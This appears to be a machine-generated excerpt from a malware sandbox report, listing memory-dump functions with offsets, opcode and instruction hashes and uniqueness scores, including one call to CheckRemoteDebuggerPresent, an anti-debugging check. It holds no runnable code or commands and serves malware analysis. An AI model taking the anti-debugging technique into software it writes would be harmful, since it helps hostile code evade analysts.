                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00EAD64F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.461546770.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                            • String ID:
                                                                                                            • API String ID: 3662101638-0
                                                                                                            • Opcode ID: c434eb9fa349006888ed562a85f449733a2257c28efead86dddf2e39b352c4d2
                                                                                                            • Instruction ID: 165d2bb237169a92c6b37a7e4a6e9d621363188803885551607b29448598afef
                                                                                                            • Opcode Fuzzy Hash: c434eb9fa349006888ed562a85f449733a2257c28efead86dddf2e39b352c4d2
                                                                                                            • Instruction Fuzzy Hash: A62148B19042198FCB00CF99D984BEEBBF4EF49324F15846AE459B7740D778A944CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Executed Functions

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PU
                                                                                                            • API String ID: 0-1993420189
                                                                                                            • Opcode ID: 1b9409f093601a01b3fe0e3549e094993c24d758f65766b3f2426a55886fb9fc
                                                                                                            • Instruction ID: d48cb2ac2e9121c008047da0d732ef4cb978bb2e7c70ffa026b1ec9a955ee818
                                                                                                            • Opcode Fuzzy Hash: 1b9409f093601a01b3fe0e3549e094993c24d758f65766b3f2426a55886fb9fc
                                                                                                            • Instruction Fuzzy Hash: 4151CB3D682205CFD746FF7CE8644597362FB89A05360C929D401DB268EB39AD06CF80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 559d5c0179276a8830b2e263cd4b11a2f1fe3c57c04535769556c62a1f993f5c
                                                                                                            • Instruction ID: f34eb98e9137f4d63fc344eb0e2282eafec9496887a51da9e4e826a0807731b4
                                                                                                            • Opcode Fuzzy Hash: 559d5c0179276a8830b2e263cd4b11a2f1fe3c57c04535769556c62a1f993f5c
                                                                                                            • Instruction Fuzzy Hash: D921BF30B002158FCB54EB798861AAEBBF2AF88614B29447DE645DB395EF70DC058791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7947564f64d2d9fa0738fbfff51a714bcb3eca0893c6a0fe0d506530e5259714
                                                                                                            • Instruction ID: 084641d0fb93638977c6787f0bc783ad75d416098a25ec758861488eb88c725d
                                                                                                            • Opcode Fuzzy Hash: 7947564f64d2d9fa0738fbfff51a714bcb3eca0893c6a0fe0d506530e5259714
                                                                                                            • Instruction Fuzzy Hash: B12125B2508300DFCF05CF54DDC0B66BB65FB88318F24C669E9055B256C33AD856DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ce1cd30ab8d08a18bca036e911858929212c625a7b035eed8eef1f41595ca2df
                                                                                                            • Instruction ID: 773e190019e48736c1907b02b068a58d67ac9f885759d13511f87f4d3f3ce680
                                                                                                            • Opcode Fuzzy Hash: ce1cd30ab8d08a18bca036e911858929212c625a7b035eed8eef1f41595ca2df
                                                                                                            • Instruction Fuzzy Hash: EC2125B1508240DFDF05CF54DDC0B6ABF65FB88328F24C569E9095B246C33AD845DBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a55a25fc5c48c8378c4ffbde2c1ec04e18a1a669d05ecd99ba26c88ea07c875
                                                                                                            • Instruction ID: 7a984e6b984107295a823e4df2f875846e71338ca51ccfe06eb92586b65ee305
                                                                                                            • Opcode Fuzzy Hash: 0a55a25fc5c48c8378c4ffbde2c1ec04e18a1a669d05ecd99ba26c88ea07c875
                                                                                                            • Instruction Fuzzy Hash: E621D7306012229FDFD46B76D84473E3FA47F89746B181828DA07D52DAEF70D404CE95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d6bf18b5cbd01c831b04018edc14287b6aa9d9bf52db412544deff87a5171155
                                                                                                            • Instruction ID: 93b12f87697cbafc66e8ee4607772dcd24ad37d63e513bf1aeceed0500cb54b2
                                                                                                            • Opcode Fuzzy Hash: d6bf18b5cbd01c831b04018edc14287b6aa9d9bf52db412544deff87a5171155
                                                                                                            • Instruction Fuzzy Hash: F8119070B042055FDB48ABBC48103AEB5EA9FC9204F11483ED50AEBB85EF348D0943E2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb0b3204f9e54c91ba6177012692110fc637dc3b94983174fde465a6509cb3ac
                                                                                                            • Instruction ID: e1d6f9d7c7072b418c56f690c419685f1d3aeaf8b5eb47350c4b4da045aac6e1
                                                                                                            • Opcode Fuzzy Hash: eb0b3204f9e54c91ba6177012692110fc637dc3b94983174fde465a6509cb3ac
                                                                                                            • Instruction Fuzzy Hash: C9216D76508280DFCF16CF50D9C4B56BF71FB84314F2886A9D8485B656C33AD86ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310650486.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a7aa71d7344cb9ef96c43aa9f523a1710f819d5ec3c422f98cc3a8be254e3fa2
                                                                                                            • Instruction ID: 5a674573af63b8be553ac8ed7b3f7079e76c6d5e37550988931b8c7f1a19ccec
                                                                                                            • Opcode Fuzzy Hash: a7aa71d7344cb9ef96c43aa9f523a1710f819d5ec3c422f98cc3a8be254e3fa2
                                                                                                            • Instruction Fuzzy Hash: E411E676408280CFCF12CF14D9C4B16BF71FB84328F28C6A9D8051B656C336D85ACBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e57883a55b1a8dd71c95d88978ffb507a18beaf931a68a30fb04093db3cdac53
                                                                                                            • Instruction ID: 7a968404f2f3f61b87c02606aba1939208213f98bb3bc0b79b3f7f7cdbf8269d
                                                                                                            • Opcode Fuzzy Hash: e57883a55b1a8dd71c95d88978ffb507a18beaf931a68a30fb04093db3cdac53
                                                                                                            • Instruction Fuzzy Hash: 5111E134B00204CFCB94EB78C918A6A77E5BF896147158878D10ADB710EF34DC05CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000011.00000002.310763240.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f07dcfba4f57479c78d05e2134b4fd23588e538c55aedcc7c417219bd9ec593a
                                                                                                            • Instruction ID: 34a1be522e456695801138bb9edb40c83986a8c1b5f55ae5f19e20b4a6a717f4
                                                                                                            • Opcode Fuzzy Hash: f07dcfba4f57479c78d05e2134b4fd23588e538c55aedcc7c417219bd9ec593a
                                                                                                            • Instruction Fuzzy Hash: 7AE0C2327001005F8344977EA88489FB7DAEFCE5B9314807AF10AC7322CE70DC058790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions